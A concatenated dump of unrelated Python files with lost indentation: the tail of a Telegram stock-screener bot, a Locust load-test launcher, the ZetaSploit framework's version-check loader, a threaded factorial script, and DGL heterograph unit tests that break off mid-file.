screen = requests.get(f'https://finviz.com/screener.ashx?v={version}&f=an_recom_holdbetter,cap_midover,fa_eps5years_pos,fa_grossmargin_pos,fa_netmargin_pos,fa_opermargin_pos,fa_sales5years_pos,geo_usa,ta_rsi_os30&ft=4&o=-marketcap&r=1', headers = headers).text
tables = pd.read_html(screen)
tables = tables[-2]
tables.columns = tables.iloc[0]
tables = tables[1:]
return tables
tables111 = get_screener('111')
tables161 = get_screener('161')
tables121 = get_screener('121')
consolidatedtables = pd.merge(tables111,tables161,how='outer',left_on='Ticker',right_on='Ticker')
consolidatedtables = pd.merge(consolidatedtables,tables121,how='outer',left_on='Ticker',right_on='Ticker')
consolidatedtables.to_csv('test.csv')
csv_file = pd.read_csv('test.csv', usecols = ['Ticker','P/E_x'])
if csv_file is not None:
text_msg = "```Screener results"
for row in csv_file:
text_msg += row
text_msg += "```"
self.tg_send_msg_post(text_msg, chat["id"])
else:
text_msg = "```\nError\n```"
self.tg_send_msg_post(text_msg, chat["id"])
def bot_cmd_handler(self, fnc, chat, text, msg_from):
p = multiprocessing.Process(target=fnc, args=(chat, text, msg_from))
p.daemon = True
p.start()
def bot_loop(self):
self.test_tg_or_die()
self.test_redis_or_die()
# Disable pidfile creation to allow multiple bot instances
#self.logger.info("Bot is running with pid {}".format(self.write_pidfile()))
last_update_id = 0
while True:
try:
msgs = self.tg_get_messages(offset=last_update_id)
except:
self.logger.error("Unable to query Telegram Bot API")
time.sleep(30)
continue
for m in msgs["result"]:
try:
update_id = m["update_id"]
# Support for telegram edited messages
if "edited_message" in m.keys():
msg_key = "edited_message"
else:
msg_key = "message"
chat = m[msg_key]["chat"]
text = m[msg_key]["text"]
msg_from = m[msg_key]["from"]
except Exception as e:
self.logger.error("Error parsing update: {}".format(m))
last_update_id = update_id + 1
continue
self.logger.debug("{} {} {}".format(msg_from, chat, text))
hit_antiflood = self.bot_antiflood_check(msg_from, time.time())
if hit_antiflood:
self.logger.warning("User hit antiflood protection")
# Increase update id
last_update_id = update_id + 1
continue
# Check chat authorization if enabled
chat_auth = True
if self.BOT_ENABLED_PASS:
chat_auth = self.bot_auth_chat(chat)
if not chat_auth:
self.logger.warning("Message from unauthorized chat: {} {}".format(msg_from, text))
# Remove explicit bot mention if found
# (telegram bot accounts always end with "bot")
text = re.sub(r"@[\w\.\-]+bot", "", text, flags=re.IGNORECASE)
# Allow command if it's explicitly allowed (--allow)
if text.split(" ")[0] in self.ALLOW_COMMANDS:
chat_auth = True
# Handle commands
if text in ("/help", "/start"):
self.bot_cmd_help(chat, text, msg_from)
elif self.BOT_ENABLED_PASS and text.startswith("/auth "):
self.bot_cmd_auth(chat, text, msg_from)
else: # Authorized-only commands
if not chat_auth and text.split(" ")[0] in ("/quote", "/chart", "/news",
"/watch", "/watchlist", "/watchlistnotify",
"/overview", "/feargreed", "/screener"):
text_msg = "```\nUnauthorized\n```"
if self.ALLOW_COMMANDS:
text_msg += "Commands allowed without authentication: {}\n".format(
" ".join(self.ALLOW_COMMANDS))
text_msg += "Type /help for more information"
self.tg_send_msg_post(text_msg, chat["id"])
elif chat_auth and text.startswith("/quote "):
self.bot_cmd_handler(self.bot_cmd_quote, chat, text, msg_from)
elif chat_auth and text.startswith("/chart "):
self.bot_cmd_handler(self.bot_cmd_chart, chat, text, msg_from)
elif chat_auth and text.startswith("/news "):
self.bot_cmd_handler(self.bot_cmd_news, chat, text, msg_from)
elif chat_auth and text.startswith("/watch "):
self.bot_cmd_handler(self.bot_cmd_watch, chat, text, msg_from)
elif chat_auth and text == "/watchlist":
self.bot_cmd_handler(self.bot_cmd_watchlist, chat, text, msg_from)
elif chat_auth and text == "/watchlistnotify":
self.bot_cmd_handler(self.bot_cmd_watchlistnotify, chat, text, msg_from)
elif chat_auth and text == "/overview":
self.bot_cmd_handler(self.bot_cmd_overview, chat, text, msg_from)
elif chat_auth and text == "/feargreed":
self.bot_cmd_handler(self.bot_cmd_feargreed, chat, text, msg_from)
elif chat_auth and text == "/screener":
self.bot_cmd_handler(self.bot_cmd_screener, chat, text, msg_from)
# Increase update id
last_update_id = update_id + 1
def main():
parser = argparse.ArgumentParser(description="Tickergram bot")
parser.add_argument("token", help="Telegram Bot API token", nargs=1)
parser.add_argument("-p", "--password", default="", help="Set a password required to interact with the bot (enables the /auth command)")
parser.add_argument("-a", "--allow", default="", help="Allow certain commands without requiring the password, comma-separated list (example: /quote,/chart)",
type=lambda s: [i for i in s.split(",")] if s else [])
parser.add_argument("-r", "--redis", default="localhost", help="redis host to use")
parser.add_argument("-l", "--port", type=int, default=6379, help="redis port to use")
parser.add_argument("-d", "--db", type=int, default=0, help="redis database to use")
args = parser.parse_args()
b = tickergram(args.token[0], redis_host=args.redis, redis_port=args.port, redis_db=args.db, password=args.password, allow_commands=args.allow)
b.bot_loop()
def notify_watchers():
parser = argparse.ArgumentParser(description="Tickergram bot notifications. Sends a message with the current status of the watchlist to the chats with enabled notifications.")
parser.add_argument("token", help="Telegram Bot API token", nargs=1)
parser.add_argument("-r", "--redis", default="localhost", help="redis host to use")
parser.add_argument("-l", "--port", type=int, default=6379, help="redis port to use")
parser.add_argument("-d", "--db", type=int, default=0, help="redis database to use")
args = parser.parse_args()
b = tickergram(args.token[0], redis_host=args.redis, redis_port=args.port, redis_db=args.db)
b.bot_watchlist_notify()
if __name__ == "__main__":
main()
|
locust.py
|
import gevent.monkey
gevent.monkey.patch_all()
import sys
import time
import multiprocessing
import socket
# import gevent
from locust import runners
# from locust import events, web
from locust import events
from locust.main import version, load_locustfile
from locust.stats import print_percentile_stats, print_error_report, print_stats
from slocust.base import master_options, slave_options
from slocust.logger import logger
def parse_locustfile(locustfile):
docstring, locusts = load_locustfile(locustfile)
locust_classes = list(locusts.values())
return locust_classes
def start_master(locust_classes, slaves_num):
# web
# logger.info("Starting web monitor at {}:{}".format(
# master_options.web_host or "*", master_options.port))
# master_greenlet = gevent.spawn(web.start, locust_classes, master_options)
# no_web
# todo: run time
runners.locust_runner = runners.MasterLocustRunner(locust_classes, master_options)
while len(runners.locust_runner.clients.ready) < slaves_num:
logger.info("Waiting for slaves to be ready, %s of %s connected",
len(runners.locust_runner.clients.ready), slaves_num)
time.sleep(1)
logger.info("%s slave connected, start hatching",
len(runners.locust_runner.clients.ready))
runners.locust_runner.start_hatching(master_options.num_clients, master_options.hatch_rate)
master_greenlet = runners.locust_runner.greenlet
try:
master_greenlet.join()
except KeyboardInterrupt:
events.quitting.fire()
print_stats(runners.locust_runner.request_stats)
print_percentile_stats(runners.locust_runner.request_stats)
print_error_report()
sys.exit(0)
def start_slave(locust_classes):
runners.locust_runner = runners.SlaveLocustRunner(locust_classes, slave_options)
slave_greenlet = runners.locust_runner.greenlet
try:
slave_greenlet.join()
except socket.error as ex:
logger.error("Failed to connect to the Locust master: %s", ex)
sys.exit(-1)
except KeyboardInterrupt:
events.quitting.fire()
sys.exit(0)
class LocustStarter(object):
def __init__(self, api_host, master_host, port, num_clients, hatch_rate,
slave_only=False):
logger.info("Starting Locust %s" % version)
master_options.host = api_host
master_options.port = port
master_options.num_clients = num_clients
master_options.hatch_rate = hatch_rate
slave_options.master_host = master_host
self.slave_only = slave_only
def start(self, locustfile, slaves_num):
locust_classes = parse_locustfile(locustfile)
slaves_num = slaves_num or multiprocessing.cpu_count()
logger.info("Starting %s slaves" % slaves_num)
processes = []
for _ in range(slaves_num):
p_slave = multiprocessing.Process(target=start_slave, args=(locust_classes,))
p_slave.daemon = True
p_slave.start()
processes.append(p_slave)
try:
if self.slave_only:
[process.join() for process in processes]
else:
start_master(locust_classes, slaves_num)
except KeyboardInterrupt:
sys.exit(0)
|
loader.py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import sys
import time
import threading
import os
import string
import requests
from core.badges import badges
from core.importer import importer
from core.config import config
class loader:
def __init__(self):
self.badges = badges()
self.importer = importer()
self.config = config()
def load_update_process(self):
remote_config = requests.get('https://raw.githubusercontent.com/EntySec/ZetaSploit/main/config/core_config.yml', stream=True)
remote_config = remote_config.content
if self.config.get_config_file(remote_config)['details']['version'] != self.config.core_config['details']['version']:
self.badges.output_warning("Your ZetaSploit Framework is out-dated.")
self.badges.output_information("Consider running ./update.sh")
time.sleep(1)
def load_components(self):
self.importer.import_all()
def load_everything(self):
self.load_update_process()
self.load_components()
def load_all(self):
loading_process = threading.Thread(target=self.load_everything)
loading_process.start()
base_line = "Loading the ZetaSploit Framework..."
cycle = 0
while loading_process.is_alive():
for char in "/-\|":
status = base_line + char + "\r"
cycle += 1
if status[cycle % len(status)] in list(string.ascii_lowercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].upper() + status[cycle % len(status) + 1:]
elif status[cycle % len(status)] in list(string.ascii_uppercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].lower() + status[cycle % len(status) + 1:]
sys.stdout.write(self.badges.P + status)
time.sleep(.1)
sys.stdout.flush()
loading_process.join()
|
multithread.py
|
# Multi-threaded (subject to GIL) sum of factorials
import math
import threading
INPUT_FILE_COUNT = 10
INPUT_FILE_DIR = 'data/'
INTERMEDIATE_RESULTS_PATH = 'results/thread'
REDUCED_OUTPUT_FILE = 'results/multithread.txt'
def main():
# Create and launch threads
threads = []
for i in xrange(0, INPUT_FILE_COUNT):
threads.append(threading.Thread(target=read_and_process, args=(i,)))
for t in threads:
t.start()
# Wait for all threads to complete execution
for t in threads:
t.join()
print 'OK all threads are done'
# Reduce results of each thread into final answer
total = 0
for i in xrange(0, INPUT_FILE_COUNT):
file_name = '%s%s.txt' % (INTERMEDIATE_RESULTS_PATH, i)
print 'Reading intermediate results file %s' % file_name
with open(file_name, 'r') as infile:
for l in infile:
total += int(l)
# Write reduced output file
with open(REDUCED_OUTPUT_FILE, 'w') as outfile:
outfile.write('%s\n' % total)
print 'Done'
def read_and_process(n):
file_name = '%s%s.txt' % (INPUT_FILE_DIR, n)
print 'Reading and processing file %s' % file_name
total = 0
with open(file_name, 'r') as infile:
for l in infile:
total += math.factorial(int(l))
with open('%s%s.txt' % (INTERMEDIATE_RESULTS_PATH, n), 'w') as outfile:
outfile.write('%s\n' % total)
print 'Thread %s just finished' % n
if __name__ == '__main__':
main()
|
test_heterograph.py
|
import dgl
import dgl.function as fn
from collections import Counter
import numpy as np
import scipy.sparse as ssp
import itertools
import backend as F
import networkx as nx
import unittest, pytest
from dgl import DGLError
import test_utils
from test_utils import parametrize_dtype, get_cases
from utils import assert_is_identical_hetero
from scipy.sparse import rand
import multiprocessing as mp
def create_test_heterograph(idtype):
# test heterograph from the docstring, plus a user -- wishes -- game relation
# 3 users, 2 games, 2 developers
# metagraph:
# ('user', 'follows', 'user'),
# ('user', 'plays', 'game'),
# ('user', 'wishes', 'game'),
# ('developer', 'develops', 'game')])
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1])
}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
return g
def create_test_heterograph1(idtype):
edges = []
edges.extend([(0, 1), (1, 2)]) # follows
edges.extend([(0, 3), (1, 3), (2, 4), (1, 4)]) # plays
edges.extend([(0, 4), (2, 3)]) # wishes
edges.extend([(5, 3), (6, 4)]) # develops
edges = tuple(zip(*edges))
ntypes = F.tensor([0, 0, 0, 1, 1, 2, 2])
etypes = F.tensor([0, 0, 1, 1, 1, 1, 2, 2, 3, 3])
g0 = dgl.graph(edges, idtype=idtype, device=F.ctx())
g0.ndata[dgl.NTYPE] = ntypes
g0.edata[dgl.ETYPE] = etypes
return dgl.to_heterogeneous(g0, ['user', 'game', 'developer'],
['follows', 'plays', 'wishes', 'develops'])
def create_test_heterograph2(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ('csr', ([0, 1, 1, 2], [1, 0], [])),
('developer', 'develops', 'game'): ('csc', ([0, 1, 2], [0, 1], [0, 1])),
}, idtype=idtype, device=F.ctx())
assert g.idtype == idtype
assert g.device == F.ctx()
return g
def create_test_heterograph3(idtype):
g = dgl.heterograph({
('user', 'plays', 'game'): (F.tensor([0, 1, 1, 2], dtype=idtype),
F.tensor([0, 0, 1, 1], dtype=idtype)),
('developer', 'develops', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.nodes['developer'].data['h'] = F.copy_to(F.tensor([3, 3], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 1, 1, 1], dtype=idtype), ctx=F.ctx())
return g
def create_test_heterograph4(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 1, 1, 2, 2, 2], dtype=idtype),
F.tensor([0, 0, 1, 1, 2, 2], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.edges['follows'].data['h'] = F.copy_to(F.tensor([1, 2, 3, 4, 5, 6], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
return g
def create_test_heterograph5(idtype):
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([1, 2], dtype=idtype),
F.tensor([0, 1], dtype=idtype)),
('user', 'plays', 'game'): (F.tensor([0, 1], dtype=idtype),
F.tensor([0, 1], dtype=idtype))},
idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.copy_to(F.tensor([1, 1, 1], dtype=idtype), ctx=F.ctx())
g.nodes['game'].data['h'] = F.copy_to(F.tensor([2, 2], dtype=idtype), ctx=F.ctx())
g.edges['follows'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
g.edges['plays'].data['h'] = F.copy_to(F.tensor([1, 2], dtype=idtype), ctx=F.ctx())
return g
def get_redfn(name):
return getattr(F, name)
@parametrize_dtype
def test_create(idtype):
device = F.ctx()
g0 = create_test_heterograph(idtype)
g1 = create_test_heterograph1(idtype)
g2 = create_test_heterograph2(idtype)
assert set(g0.ntypes) == set(g1.ntypes) == set(g2.ntypes)
assert set(g0.canonical_etypes) == set(g1.canonical_etypes) == set(g2.canonical_etypes)
# Create a bipartite graph from a SciPy matrix
src_ids = np.array([2, 3, 4])
dst_ids = np.array([1, 2, 3])
eweight = np.array([0.2, 0.3, 0.5])
sp_mat = ssp.coo_matrix((eweight, (src_ids, dst_ids)))
g = dgl.bipartite_from_scipy(sp_mat, utype='user', etype='plays',
vtype='game', idtype=idtype, device=device)
assert g.idtype == idtype
assert g.device == device
assert g.num_src_nodes() == 5
assert g.num_dst_nodes() == 4
assert g.num_edges() == 3
src, dst = g.edges()
assert F.allclose(src, F.tensor([2, 3, 4], dtype=idtype))
assert F.allclose(dst, F.tensor([1, 2, 3], dtype=idtype))
g = dgl.bipartite_from_scipy(sp_mat, utype='_U', etype='_E', vtype='_V',
eweight_name='w', idtype=idtype, device=device)
assert F.allclose(g.edata['w'], F.tensor(eweight))
# Create a bipartite graph from a NetworkX graph
nx_g = nx.DiGraph()
nx_g.add_nodes_from([1, 3], bipartite=0, feat1=np.zeros((2)), feat2=np.ones((2)))
nx_g.add_nodes_from([2, 4, 5], bipartite=1, feat3=np.zeros((3)))
nx_g.add_edge(1, 4, weight=np.ones((1)), eid=np.array([1]))
nx_g.add_edge(3, 5, weight=np.ones((1)), eid=np.array([0]))
g = dgl.bipartite_from_networkx(nx_g, utype='user', etype='plays',
vtype='game', idtype=idtype, device=device)
assert g.idtype == idtype
assert g.device == device
assert g.num_src_nodes() == 2
assert g.num_dst_nodes() == 3
assert g.num_edges() == 2
src, dst = g.edges()
assert F.allclose(src, F.tensor([0, 1], dtype=idtype))
assert F.allclose(dst, F.tensor([1, 2], dtype=idtype))
g = dgl.bipartite_from_networkx(nx_g, utype='_U', etype='_E', vtype='V',
u_attrs=['feat1', 'feat2'],
e_attrs = ['weight'], v_attrs = ['feat3'])
assert F.allclose(g.srcdata['feat1'], F.tensor(np.zeros((2, 2))))
assert F.allclose(g.srcdata['feat2'], F.tensor(np.ones((2, 2))))
assert F.allclose(g.dstdata['feat3'], F.tensor(np.zeros((3, 3))))
assert F.allclose(g.edata['weight'], F.tensor(np.ones((2, 1))))
g = dgl.bipartite_from_networkx(nx_g, utype='_U', etype='_E', vtype='V',
edge_id_attr_name='eid', idtype=idtype, device=device)
src, dst = g.edges()
assert F.allclose(src, F.tensor([1, 0], dtype=idtype))
assert F.allclose(dst, F.tensor([2, 1], dtype=idtype))
# create from scipy
spmat = ssp.coo_matrix(([1,1,1], ([0, 0, 1], [2, 3, 2])), shape=(4, 4))
g = dgl.from_scipy(spmat, idtype=idtype, device=device)
assert g.num_nodes() == 4
assert g.num_edges() == 3
assert g.idtype == idtype
assert g.device == device
# test inferring number of nodes for heterograph
g = dgl.heterograph({
('l0', 'e0', 'l1'): ([0, 0], [1, 2]),
('l0', 'e1', 'l2'): ([2], [2]),
('l2', 'e2', 'l2'): ([1, 3], [1, 3])
}, idtype=idtype, device=device)
assert g.num_nodes('l0') == 3
assert g.num_nodes('l1') == 3
assert g.num_nodes('l2') == 4
assert g.idtype == idtype
assert g.device == device
# test if validate flag works
# homo graph
with pytest.raises(DGLError):
g = dgl.graph(
([0, 0, 0, 1, 1, 2], [0, 1, 2, 0, 1, 2]),
num_nodes=2,
idtype=idtype, device=device
)
# bipartite graph
def _test_validate_bipartite(card):
with pytest.raises(DGLError):
g = dgl.heterograph({
('_U', '_E', '_V'): ([0, 0, 1, 1, 2], [1, 1, 2, 2, 3])
}, {'_U': card[0], '_V': card[1]}, idtype=idtype, device=device)
_test_validate_bipartite((3, 3))
_test_validate_bipartite((2, 4))
# test from_scipy
num_nodes = 10
density = 0.25
for fmt in ['csr', 'coo', 'csc']:
adj = rand(num_nodes, num_nodes, density=density, format=fmt)
g = dgl.from_scipy(adj, eweight_name='w', idtype=idtype)
assert g.idtype == idtype
assert g.device == F.cpu()
assert F.array_equal(g.edata['w'], F.copy_to(F.tensor(adj.data), F.cpu()))
def test_create2():
mat = ssp.random(20, 30, 0.1)
# coo
mat = mat.tocoo()
row = F.tensor(mat.row, dtype=F.int64)
col = F.tensor(mat.col, dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('coo', (row, col))}, num_nodes_dict={'A': 20, 'B': 30})
# csr
mat = mat.tocsr()
indptr = F.tensor(mat.indptr, dtype=F.int64)
indices = F.tensor(mat.indices, dtype=F.int64)
data = F.tensor([], dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('csr', (indptr, indices, data))}, num_nodes_dict={'A': 20, 'B': 30})
# csc
mat = mat.tocsc()
indptr = F.tensor(mat.indptr, dtype=F.int64)
indices = F.tensor(mat.indices, dtype=F.int64)
data = F.tensor([], dtype=F.int64)
g = dgl.heterograph(
{('A', 'AB', 'B'): ('csc', (indptr, indices, data))}, num_nodes_dict={'A': 20, 'B': 30})
@parametrize_dtype
def test_query(idtype):
g = create_test_heterograph(idtype)
ntypes = ['user', 'game', 'developer']
canonical_etypes = [
('user', 'follows', 'user'),
('user', 'plays', 'game'),
('user', 'wishes', 'game'),
('developer', 'develops', 'game')]
etypes = ['follows', 'plays', 'wishes', 'develops']
# node & edge types
assert set(ntypes) == set(g.ntypes)
assert set(etypes) == set(g.etypes)
assert set(canonical_etypes) == set(g.canonical_etypes)
# metagraph
mg = g.metagraph()
assert set(g.ntypes) == set(mg.nodes)
etype_triplets = [(u, v, e) for u, v, e in mg.edges(keys=True)]
assert set([
('user', 'user', 'follows'),
('user', 'game', 'plays'),
('user', 'game', 'wishes'),
('developer', 'game', 'develops')]) == set(etype_triplets)
for i in range(len(etypes)):
assert g.to_canonical_etype(etypes[i]) == canonical_etypes[i]
def _test(g):
# number of nodes
assert [g.num_nodes(ntype) for ntype in ntypes] == [3, 2, 2]
# number of edges
assert [g.num_edges(etype) for etype in etypes] == [2, 4, 2, 2]
# has_node & has_nodes
for ntype in ntypes:
n = g.number_of_nodes(ntype)
for i in range(n):
assert g.has_node(i, ntype)
assert not g.has_node(n, ntype)
assert np.array_equal(
F.asnumpy(g.has_nodes([0, n], ntype)).astype('int32'), [1, 0])
assert not g.is_multigraph
for etype in etypes:
srcs, dsts = edges[etype]
for src, dst in zip(srcs, dsts):
assert g.has_edges_between(src, dst, etype)
assert F.asnumpy(g.has_edges_between(srcs, dsts, etype)).all()
srcs, dsts = negative_edges[etype]
for src, dst in zip(srcs, dsts):
assert not g.has_edges_between(src, dst, etype)
assert not F.asnumpy(g.has_edges_between(srcs, dsts, etype)).any()
srcs, dsts = edges[etype]
n_edges = len(srcs)
# predecessors & in_edges & in_degree
pred = [s for s, d in zip(srcs, dsts) if d == 0]
assert set(F.asnumpy(g.predecessors(0, etype)).tolist()) == set(pred)
u, v = g.in_edges([0], etype=etype)
assert F.asnumpy(v).tolist() == [0] * len(pred)
assert set(F.asnumpy(u).tolist()) == set(pred)
assert g.in_degrees(0, etype) == len(pred)
# successors & out_edges & out_degree
succ = [d for s, d in zip(srcs, dsts) if s == 0]
assert set(F.asnumpy(g.successors(0, etype)).tolist()) == set(succ)
u, v = g.out_edges([0], etype=etype)
assert F.asnumpy(u).tolist() == [0] * len(succ)
assert set(F.asnumpy(v).tolist()) == set(succ)
assert g.out_degrees(0, etype) == len(succ)
# edge_id & edge_ids
for i, (src, dst) in enumerate(zip(srcs, dsts)):
assert g.edge_ids(src, dst, etype=etype) == i
_, _, eid = g.edge_ids(src, dst, etype=etype, return_uv=True)
assert eid == i
assert F.asnumpy(g.edge_ids(srcs, dsts, etype=etype)).tolist() == list(range(n_edges))
u, v, e = g.edge_ids(srcs, dsts, etype=etype, return_uv=True)
u, v, e = F.asnumpy(u), F.asnumpy(v), F.asnumpy(e)
assert u[e].tolist() == srcs
assert v[e].tolist() == dsts
# find_edges
for eid in [list(range(n_edges)), np.arange(n_edges), F.astype(F.arange(0, n_edges), g.idtype)]:
u, v = g.find_edges(eid, etype)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
# all_edges.
for order in ['eid']:
u, v, e = g.edges('all', order, etype)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
assert F.asnumpy(e).tolist() == list(range(n_edges))
# in_degrees & out_degrees
in_degrees = F.asnumpy(g.in_degrees(etype=etype))
out_degrees = F.asnumpy(g.out_degrees(etype=etype))
src_count = Counter(srcs)
dst_count = Counter(dsts)
utype, _, vtype = g.to_canonical_etype(etype)
for i in range(g.number_of_nodes(utype)):
assert out_degrees[i] == src_count[i]
for i in range(g.number_of_nodes(vtype)):
assert in_degrees[i] == dst_count[i]
edges = {
'follows': ([0, 1], [1, 2]),
'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
'wishes': ([0, 2], [1, 0]),
'develops': ([0, 1], [0, 1]),
}
# edges that does not exist in the graph
negative_edges = {
'follows': ([0, 1], [0, 1]),
'plays': ([0, 2], [1, 0]),
'wishes': ([0, 1], [0, 1]),
'develops': ([0, 1], [1, 0]),
}
g = create_test_heterograph(idtype)
_test(g)
g = create_test_heterograph1(idtype)
_test(g)
if F._default_context_str != 'gpu':
# XXX: CUDA COO operators have not been live yet.
g = create_test_heterograph2(idtype)
_test(g)
etypes = canonical_etypes
edges = {
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1]),
}
# edges that does not exist in the graph
negative_edges = {
('user', 'follows', 'user'): ([0, 1], [0, 1]),
('user', 'plays', 'game'): ([0, 2], [1, 0]),
('user', 'wishes', 'game'): ([0, 1], [0, 1]),
('developer', 'develops', 'game'): ([0, 1], [1, 0]),
}
g = create_test_heterograph(idtype)
_test(g)
g = create_test_heterograph1(idtype)
_test(g)
if F._default_context_str != 'gpu':
# XXX: CUDA COO operators have not been live yet.
g = create_test_heterograph2(idtype)
_test(g)
# test repr
print(g)
@parametrize_dtype
def test_empty_query(idtype):
g = dgl.graph(([1, 2, 3], [0, 4, 5]), idtype=idtype, device=F.ctx())
g.add_nodes(0)
g.add_edges([], [])
g.remove_edges([])
g.remove_nodes([])
assert F.shape(g.has_nodes([])) == (0,)
assert F.shape(g.has_edges_between([], [])) == (0,)
g.edge_ids([], [])
g.edge_ids([], [], return_uv=True)
g.find_edges([])
assert F.shape(g.in_edges([], form='eid')) == (0,)
u, v = g.in_edges([], form='uv')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
u, v, e = g.in_edges([], form='all')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
assert F.shape(e) == (0,)
assert F.shape(g.out_edges([], form='eid')) == (0,)
u, v = g.out_edges([], form='uv')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
u, v, e = g.out_edges([], form='all')
assert F.shape(u) == (0,)
assert F.shape(v) == (0,)
assert F.shape(e) == (0,)
assert F.shape(g.in_degrees([])) == (0,)
assert F.shape(g.out_degrees([])) == (0,)
@unittest.skipIf(F._default_context_str == 'gpu', reason="GPU does not have COO impl.")
def _test_hypersparse():
N1 = 1 << 50 # should crash if allocated a CSR
N2 = 1 << 48
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0], F.int64), F.tensor([1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1},
device=F.ctx())
assert g.number_of_nodes('user') == N1
assert g.number_of_nodes('game') == N1
assert g.number_of_edges('follows') == 1
assert g.number_of_edges('plays') == 1
assert g.has_edges_between(0, 1, 'follows')
assert not g.has_edges_between(0, 0, 'follows')
mask = F.asnumpy(g.has_edges_between([0, 0], [0, 1], 'follows')).tolist()
assert mask == [0, 1]
assert g.has_edges_between(0, N2, 'plays')
assert not g.has_edges_between(0, 0, 'plays')
mask = F.asnumpy(g.has_edges_between([0, 0], [0, N2], 'plays')).tolist()
assert mask == [0, 1]
assert F.asnumpy(g.predecessors(0, 'follows')).tolist() == []
assert F.asnumpy(g.successors(0, 'follows')).tolist() == [1]
assert F.asnumpy(g.predecessors(1, 'follows')).tolist() == [0]
assert F.asnumpy(g.successors(1, 'follows')).tolist() == []
assert F.asnumpy(g.predecessors(0, 'plays')).tolist() == []
assert F.asnumpy(g.successors(0, 'plays')).tolist() == [N2]
assert F.asnumpy(g.predecessors(N2, 'plays')).tolist() == [0]
assert F.asnumpy(g.successors(N2, 'plays')).tolist() == []
assert g.edge_ids(0, 1, etype='follows') == 0
assert g.edge_ids(0, N2, etype='plays') == 0
u, v = g.find_edges([0], 'follows')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [1]
u, v = g.find_edges([0], 'plays')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [N2]
u, v, e = g.all_edges('all', 'eid', 'follows')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [1]
assert F.asnumpy(e).tolist() == [0]
u, v, e = g.all_edges('all', 'eid', 'plays')
assert F.asnumpy(u).tolist() == [0]
assert F.asnumpy(v).tolist() == [N2]
assert F.asnumpy(e).tolist() == [0]
assert g.in_degrees(0, 'follows') == 0
assert g.in_degrees(1, 'follows') == 1
assert F.asnumpy(g.in_degrees([0, 1], 'follows')).tolist() == [0, 1]
assert g.in_degrees(0, 'plays') == 0
assert g.in_degrees(N2, 'plays') == 1
assert F.asnumpy(g.in_degrees([0, N2], 'plays')).tolist() == [0, 1]
assert g.out_degrees(0, 'follows') == 1
assert g.out_degrees(1, 'follows') == 0
assert F.asnumpy(g.out_degrees([0, 1], 'follows')).tolist() == [1, 0]
assert g.out_degrees(0, 'plays') == 1
assert g.out_degrees(N2, 'plays') == 0
assert F.asnumpy(g.out_degrees([0, N2], 'plays')).tolist() == [1, 0]
def _test_edge_ids():
